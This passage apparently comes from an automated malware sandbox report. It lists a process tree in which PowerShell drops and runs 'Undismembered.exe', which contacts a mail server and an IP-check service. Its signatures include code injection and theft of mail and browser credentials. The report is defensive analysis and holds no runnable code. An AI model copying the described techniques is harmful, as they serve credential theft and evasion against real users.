          2. powershell.exe drops C:\Users\user\AppData\...\Undismembered.exe (PE32) and C:\...\Undismembered.exe:Zone.Identifier (ASCII); signatures: Early bird code injection technique detected, Writes to foreign memory regions, Found suspicious powershell code related to unpacking or dynamic code loading, 3 other signatures; starts Undismembered.exe and conhost.exe
          3. Undismembered.exe connects to mail.bsp.com.es 82.98.167.108 port 587 (DINAHOSTING-ASES, Spain) and checkip.dyndns.com 132.226.8.169 ports 49700, 49703, 49705 (UTMEMUS, United States), plus 4 other IPs or domains; signatures: Multi AV Scanner detection for dropped file, Tries to steal Mail credentials (via file / registry access), Tries to harvest and steal browser information (history, passwords, etc), Switches to a custom stack to bypass stack traces

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.